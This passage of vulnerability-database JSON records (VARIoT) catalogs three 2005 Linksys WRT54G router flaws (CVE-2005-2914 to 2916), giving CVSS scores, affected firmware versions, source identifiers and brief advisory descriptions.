"version": "v3.03.3.6"
}
],
"sources": [
{
"db": "BID",
"id": "89353"
},
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.04.4:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2914"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "89353"
}
],
"trust": 0.3
},
"cve": "CVE-2005-2914",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-14123",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2914",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-200509-134",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-14123",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14123"
},
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ezconfig.asp in Linksys WRT54G router 3.01.03, 3.03.6, non-default configurations of 2.04.4, and possibly other versions, does not use an authentication initialization function, which allows remote attackers to obtain encrypted configuration information and, if the key is known, modify the configuration. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "BID",
"id": "89353"
},
{
"db": "VULHUB",
"id": "VHN-14123"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-2914",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134",
"trust": 0.7
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G ROUTER REMOTE ADMINISTRATION FIXED ENCRYPTION KEY VULNERABILITY",
"trust": 0.6
},
{
"db": "BID",
"id": "89353",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-14123",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14123"
},
{
"db": "BID",
"id": "89353"
},
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"id": "VAR-200509-0095",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14123"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T13:26:00.634000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2914"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.idefense.com/application/poi/display?id=304\u0026type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=304\u0026amp;type=vulnerabilities"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14123"
},
{
"db": "BID",
"id": "89353"
},
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14123"
},
{
"db": "BID",
"id": "89353"
},
{
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-14T00:00:00",
"db": "VULHUB",
"id": "VHN-14123"
},
{
"date": "2005-09-14T00:00:00",
"db": "BID",
"id": "89353"
},
{
"date": "2005-09-14T21:03:00",
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"date": "2005-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-14123"
},
{
"date": "2016-07-06T14:34:00",
"db": "BID",
"id": "89353"
},
{
"date": "2008-09-05T20:52:58.890000",
"db": "NVD",
"id": "CVE-2005-2914"
},
{
"date": "2005-10-20T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G Configuration Information Disclosure Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unknown",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-134"
}
],
"trust": 0.6
}
}
VAR-200509-0096
Vulnerability from variot - Updated: 2023-12-18 13:26
ezconfig.asp in Linksys WRT54G router 3.01.03, 3.03.6, non-default configurations of 2.04.4, and possibly other versions, uses weak encryption (XOR encoding with a fixed byte mask) for configuration information, which could allow attackers to decrypt the information and possibly re-encrypt it in conjunction with CVE-2005-2914. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0096",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "2.04.4_non_default"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
}
],
"sources": [
{
"db": "BID",
"id": "89351"
},
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:2.04.4_non_default:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2915"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "89351"
}
],
"trust": 0.3
},
"cve": "CVE-2005-2915",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "VHN-14124",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2915",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200509-117",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-14124",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14124"
},
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "ezconfig.asp in Linksys WRT54G router 3.01.03, 3.03.6, non-default configurations of 2.04.4, and possibly other versions, uses weak encryption (XOR encoding with a fixed byte mask) for configuration information, which could allow attackers to decrypt the information and possibly re-encrypt it in conjunction with CVE-2005-2914. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "BID",
"id": "89351"
},
{
"db": "VULHUB",
"id": "VHN-14124"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-2915",
"trust": 2.0
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G ROUTER REMOTE ADMINISTRATION FIXED ENCRYPTION KEY VULNERABILITY",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117",
"trust": 0.6
},
{
"db": "BID",
"id": "89351",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-14124",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14124"
},
{
"db": "BID",
"id": "89351"
},
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"id": "VAR-200509-0096",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14124"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T13:26:00.656000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2915"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://www.idefense.com/application/poi/display?id=304\u0026type=vulnerabilities"
},
{
"trust": 0.1,
"url": "http://www.idefense.com/application/poi/display?id=304\u0026amp;type=vulnerabilities"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14124"
},
{
"db": "BID",
"id": "89351"
},
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-14124"
},
{
"db": "BID",
"id": "89351"
},
{
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2005-09-14T00:00:00",
"db": "VULHUB",
"id": "VHN-14124"
},
{
"date": "2005-09-14T00:00:00",
"db": "BID",
"id": "89351"
},
{
"date": "2005-09-14T21:03:00",
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"date": "2005-09-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-09-05T00:00:00",
"db": "VULHUB",
"id": "VHN-14124"
},
{
"date": "2016-07-06T14:34:00",
"db": "BID",
"id": "89351"
},
{
"date": "2008-09-05T20:52:59.047000",
"db": "NVD",
"id": "CVE-2005-2915"
},
{
"date": "2005-10-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G ezconfig.asp Weak coding vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "unknown",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200509-117"
}
],
"trust": 0.6
}
}
VAR-200509-0097
Vulnerability from variot - Updated: 2023-12-18 12:47
Linksys WRT54G 3.01.03, 3.03.6, 4.00.7, and possibly other versions before 4.20.7, does not verify user authentication until after an HTTP POST request has been processed, which allows remote attackers to (1) modify configuration using restore.cgi or (2) upload new firmware using upgrade.cgi. In other words, the POST body is acted on before the authentication check runs, so an unauthenticated request still takes effect. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router.
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200509-0097",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.03.6"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "3.01.3"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 1.6,
"vendor": "linksys",
"version": "4.00.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v4.04.0.7"
},
{
"model": "wrt54g",
"scope": "eq",
"trust": 0.3,
"vendor": "linksys",
"version": "v3.03.3.6"
}
],
"sources": [
{
"db": "BID",
"id": "89357"
},
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.03.6:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:4.00.7:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:linksys:wrt54g:3.01.3:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2916"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Unknown",
"sources": [
{
"db": "BID",
"id": "89357"
}
],
"trust": 0.3
},
"cve": "CVE-2005-2916",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "VHN-14125",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2005-2916",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-200509-119",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-14125",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14125"
},
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Linksys WRT54G 3.01.03, 3.03.6, 4.00.7, and possibly other versions before 4.20.7, does not verify user authentication until after an HTTP POST request has been processed, which allows remote attackers to (1) modify configuration using restore.cgi or (2) upload new firmware using upgrade.cgi. WRT54G v1.0 is prone to a remote security vulnerability. Linksys WRT54G is a Cisco wireless router. cgi to modify configuration or (2) upload new firmware using upgrade.cgi",
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "BID",
"id": "89357"
},
{
"db": "VULHUB",
"id": "VHN-14125"
}
],
"trust": 1.26
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2005-2916",
"trust": 2.0
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119",
"trust": 0.7
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G \u0027UPGRADE.CGI\u0027 FIRMWARE UPLOAD DESIGN ERROR VULNERABILITY",
"trust": 0.6
},
{
"db": "IDEFENSE",
"id": "20050913 LINKSYS WRT54G \u0027RESTORE.CGI\u0027 CONFIGURATION MODIFICATION DESIGN ERROR VULNERABILITY",
"trust": 0.6
},
{
"db": "BID",
"id": "89357",
"trust": 0.3
},
{
"db": "VULHUB",
"id": "VHN-14125",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-14125"
},
{
"db": "BID",
"id": "89357"
},
{
"db": "NVD",
"id": "CVE-2005-2916"
},
{
"db": "CNNVD",
"id": "CNNVD-200509-119"
}
]
},
"id": "VAR-200509-0097",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-14125"
}
],
"trust": 0.6353147
},
"last_update_date": "2023-12-18T12:47:16.724000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-Other",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2005-2916"
}
]
},
"references": {
